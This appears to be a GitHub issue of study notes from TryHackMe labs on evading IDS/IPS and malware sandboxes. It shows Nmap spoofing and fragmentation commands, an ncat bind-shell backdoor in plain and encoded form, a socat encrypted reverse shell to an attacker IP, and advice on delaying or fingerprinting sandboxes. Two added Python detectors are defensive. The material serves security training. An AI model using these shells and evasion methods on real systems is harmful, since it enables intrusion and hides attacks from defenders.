Open WDavid404 opened 7 months ago
Each IDS/IPS has a certain syntax to write its rules.
For netcat, you can use UDP with the option -u.
For nmap, you can add the option -g PORT_NUMBER (or --source-port PORT_NUMBER) to make Nmap send all its traffic from a specific source port number.
nmap -sS -Pn -g 80 -F MACHINE_IP
to make the port scanning traffic appear to be exchanged with an HTTP server at first glance.
nmap -sU -Pn -g 53 -F MACHINE_IP
to make the traffic appear to be exchanged with a DNS server.
fragroute -f fragroute.conf HOST
Nmap makes it possible to create invalid packets in a variety of ways. In particular, two common options would be to scan the target using packets that have:
- an invalid TCP/UDP checksum (--badsum)
- invalid TCP flags (--scanflags), which lets you choose which flags you want to set:
- URG for Urgent
- ACK for Acknowledge
- PSH for Push
- RST for Reset
- SYN for Synchronize
- FIN for Finish
pentester@TryHackMe$ cat input.txt
ncat -lvnp 1234 -e /bin/bash
$ base64 input.txt
bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==
pentester@TryHackMe$ urlencode ncat -lvnp 1234 -e /bin/bash
ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash
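As an added defender-side example (not from the TryHackMe room or these notes): a small Python detector that peels URL encoding and base64 off log fields and looks for the ncat backdoor command shown above at any decoding depth, so the encoding does not hide it from a log review. The log lines are constructed for the example; the SUSPICIOUS pattern and the 12-character token threshold are my assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed web-access log lines (not a real capture): the ncat backdoor command
# in clear, base64-encoded, URL-encoded, and URL-encoded-then-base64 form.
SAMPLE_LOG = [
    "GET /index.html HTTP/1.1 200",
    "POST /api/run cmd=bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA== 200",
    "GET /exec?c=ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash 500",
    "POST /api/run cmd=bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA%3D%3D 200",
]

# Assumed signature: an nc-family tool handing over a shell with -e.
SUSPICIOUS = re.compile(r"\b(?:ncat|netcat|nc)\b.*?-e\s+/bin/(?:ba)?sh")
# Candidate encoded tokens: runs of base64/URL-encoding characters plus optional padding.
TOKEN = re.compile(r"[A-Za-z0-9+/%._-]{12,}={0,2}")

def decode_layers(token, max_depth=4):
    """Peel URL encoding and strict base64 alternately; return every intermediate string."""
    layers = [token]
    cur = token
    for _ in range(max_depth):
        nxt = unquote(cur)                      # URL-decode first; it never raises
        if nxt == cur:                          # nothing to unquote, so try base64
            try:
                nxt = base64.b64decode(cur, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                break
        if nxt == cur or not nxt.isprintable():
            break                               # no progress, or binary data
        cur = nxt
        layers.append(cur)
    return layers

def scan_line(line):
    """First match as {'payload', 'depth'} (depth 0 = clear text), else None."""
    if SUSPICIOUS.search(line):
        return {"payload": line, "depth": 0}
    for token in TOKEN.findall(line):
        for depth, candidate in enumerate(decode_layers(token)[1:], start=1):
            if SUSPICIOUS.search(candidate):
                return {"payload": candidate, "depth": depth}
    return None

def scan_log(lines):
    """Map line index -> decoding depth for every line that matched."""
    return {i: hit["depth"] for i, line in enumerate(lines) if (hit := scan_line(line))}
```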
For example, you can use CyberChef to select and configure the Escape Unicode Characters recipe as shown in the image below.
Because an IDS/IPS won’t inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key.
On the attacker system, we carried out the following:
pentester@TryHackMe$ openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt
Generating a RSA private key
........................++++
......++++
writing new private key to 'thm-reverse.key'
-----
pentester@TryHackMe$ ls
thm-reverse.crt thm-reverse.key
pentester@TryHackMe$ cat thm-reverse.key thm-reverse.crt > thm-reverse.pem
pentester@TryHackMe$ socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT
2022/02/24 13:39:07 socat[1208] W ioctl(6, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device
2022/02/24 13:39:07 socat[1208] N listening on AF=2 0.0.0.0:4443
On the victim machine:
pentester@target$ socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash
In many cases, you can use source routing to force the packets to use a certain route to reach their destination. Nmap provides this feature using the option --ip-options.
nmap -sS --proxies HTTP://PROXY_HOST1:8080,SOCKS4://PROXY_HOST2:4153 MACHINE_IP
This way, you would make your scan go through HTTP proxy host1, then SOCKS4 proxy host2, before reaching your target.
It is important to note that finding a reliable proxy requires some trial and error before you can rely on it to hide your Nmap scan source.
Consequently, you might find it beneficial if you can:
Pentesting frameworks, such as Cobalt Strike and Empire, offer malleable Command and Control (C2) profiles. These profiles allow various fine-tuning to evade IDS/IPS systems. If you are using such a framework, it is worth creating a custom profile instead of relying on a default one. Example variables you can control include the following:
Next-Generation Network IPS (NGNIPS) has the following five characteristics according to Gartner:
In this room, we group Nmap techniques into three groups:
Nmap allows you to hide or spoof the source as you can use:
Using the -D option, you can add decoy source IP addresses to confuse the target. Consider the following command: nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F MACHINE_IP
You can also set Nmap to use random decoy source IP addresses instead of specifying them explicitly by running nmap -sS -Pn -D RND,RND,ME -F MACHINE_IP
nmap -sS -Pn --proxies PROXY_URL -F MACHINE_IP
The --spoof-mac MAC_ADDRESS option spoofs the source MAC address. Spoofing the MAC address works only if your system is on the same network segment as the target host, because the target system is going to reply to the spoofed MAC address.
The -S IP_ADDRESS option spoofs the source IP address. Spoofing the IP address is useful if your system is on the same subnetwork as the target host; otherwise, you won't be able to read the replies sent back.
Using the -g or --source-port option: nmap -sS -Pn -g 8080 -F MACHINE_IP
The -f option fragments the IP packet to carry only 8 bytes of data: nmap -sS -Pn -f -F MACHINE_IP
Specifying the option twice (-ff) uses 16 bytes of data per fragment.
--mtu VALUE specifies the number of data bytes per IP packet, i.e. the IP header size is not included. The value set for MTU must always be a multiple of 8.
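Added example, not from these notes or the Nmap project: a Python checker a defender can run over raw IPv4 packets to spot the two tricks described above, a bare SYN arriving from a service port such as 53 or 80 (-g/--source-port) and an -f style first fragment too small to hold the 20-byte TCP header. The packets are constructed inline with zero checksums, and the trusted-port set is an assumption.

```python
import socket
import struct

# Service ports an attacker may pick with -g/--source-port to blend in (assumed set).
TRUSTED_SERVICE_PORTS = {53, 80}
TCP = 6

def ipv4(src, dst, proto, payload, ident=1, frag_off=0, mf=False, ttl=64):
    """Minimal IPv4 header, no options; checksum left at 0 (constructed data, not a capture)."""
    flags_frag = (0x2000 if mf else 0) | (frag_off // 8)   # MF flag, offset in 8-byte units
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload

def tcp_header(sport, dport, flags):
    """20-byte TCP header, data offset 5, checksum 0 (constructed). SYN=0x02, ACK=0x10."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, flags, 1024, 0, 0)

def analyze(pkt):
    """Return alert strings for one raw IPv4 packet given as bytes."""
    alerts = []
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ident, frag = struct.unpack_from("!HHH", pkt, 2)
    mf, offset = bool(frag & 0x2000), (frag & 0x1FFF) * 8
    payload = pkt[ihl:total_len]
    if pkt[9] != TCP or offset != 0:
        return alerts                      # only a first fragment carries the TCP header
    if mf and len(payload) < 20:
        # nmap -f puts 8 bytes of data per fragment, so the 20-byte TCP header is split
        alerts.append(f"tiny first fragment id={ident}: {len(payload)} bytes, TCP header split")
    elif len(payload) >= 20:
        sport, dport = struct.unpack_from("!HH", payload, 0)
        if (payload[13] & 0x12) == 0x02 and sport in TRUSTED_SERVICE_PORTS:
            # A real server replies with SYN/ACK from its port; a bare SYN from 53/80 is a client hiding
            alerts.append(f"SYN from service port {sport} to {dport}: possible --source-port spoofing")
    return alerts

# Constructed packets: a normal SYN, a SYN faked from port 80, a genuine SYN/ACK reply
# from port 80, and an nmap -f style first fragment holding 8 bytes of the TCP header.
SAMPLE_PACKETS = {
    "normal_syn": ipv4("10.0.0.5", "10.0.0.9", TCP, tcp_header(40000, 22, 0x02)),
    "syn_from_80": ipv4("10.0.0.5", "10.0.0.9", TCP, tcp_header(80, 22, 0x02)),
    "synack_from_80": ipv4("10.0.0.9", "10.0.0.5", TCP, tcp_header(80, 40000, 0x12)),
    "tiny_fragment": ipv4("10.0.0.5", "10.0.0.9", TCP, tcp_header(40000, 22, 0x02)[:8], ident=7, mf=True),
}

def alert_counts():
    """Number of alerts per sample packet."""
    return {name: len(analyze(pkt)) for name, pkt in SAMPLE_PACKETS.items()}
```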
nmap -sS -Pn --data-length 64 -F MACHINE_IP
| Evasion Approach | Nmap Argument |
|---|---|
| Set IP time-to-live field | --ttl VALUE |
| Send packets with specified IP options | --ip-options OPTIONS |
| Send packets with a wrong TCP/UDP checksum | --badsum |
e.g.
nmap -sS -Pn --ttl 81 -F MACHINE_IP
nmap -sS -Pn --badsum -F MACHINE_IP
Port hopping is a technique where an application hops from one port to another till it can establish and maintain a connection. In other words, the application might try different ports till it can successfully establish a connection.
Port tunneling is also known as port forwarding and port mapping.
ncat -lvnp 443 -c "ncat TARGET_SERVER 25"
ncat -lvnp PORT_NUMBER -e /bin/bash
will create a backdoor via the specified port number that lets you interact with the Bash shell.
One of the most creative and effective ways that Blue Teamers have come up with to analyze suspicious-looking files is in the category of Dynamic Analysis. This method involves running the file in a containerized (or virtualized) environment; this environment is referred to as a Sandbox. Depending on the sandbox of choice, you may be able to customize what version of Windows is running, the software installed on the machine, and much more.
Various vendors make Sandbox products that Blue Teamers may be able to deploy in a corporate network. Here are some popular examples:
Four broad categories:
Malware Sandboxes are often limited by a time constraint to prevent the overallocation of resources, which may increase the Sandbox's queue drastically. This is a crucial aspect that we can abuse; if we know that a Sandbox will only run for five minutes at any given time, we can implement a sleep timer that sleeps for five minutes before our shellcode is executed.
One defining factor of Sandboxes is that they are often located off-premise and are hosted by Anti-Virus providers. If you know you are attacking TryHackMe, a European company, and your binary is executed in California, you can make an educated guess that the binary has ended up in a Sandbox.
You may choose to implement a geolocation filter on your program that checks if the IP Address block is owned by the company you are targeting or if it is from a residential address space. There are several services that you can use to check this information:
Another incredibly popular method is to observe system information. Most Sandboxes typically have reduced resources. A popular Malware Sandbox service, Any.Run, only allocates 1 CPU core and 4GB of RAM per virtual machine, whereas on a real target you can expect more than 2 CPU cores per system and more than 4GB of RAM. Knowing this, we can tailor our code to query for basic system info (CPU core count, RAM amount, disk size, etc.).
Another method involves querying information about the Active Directory domain.
Almost no Malware Sandboxes are joined to a domain, so it's relatively safe to assume that if the machine is not joined to a domain, it is not the right target! However, you cannot always be too sure, so you should collect some information about the domain to be safe. There are many objects that you can query; here are some to consider:
These techniques can vary in difficulty; therefore, you should consider how much time and effort you want to spend building out these evasion methods. A simple method, such as checking the system's environment variables (this can be done with echo %VARIABLE%, or use the set command to display all variables) for an item like LogonServer, LogonUserSid, or LogonDomain, may be much easier than implementing a Windows API call.
IDS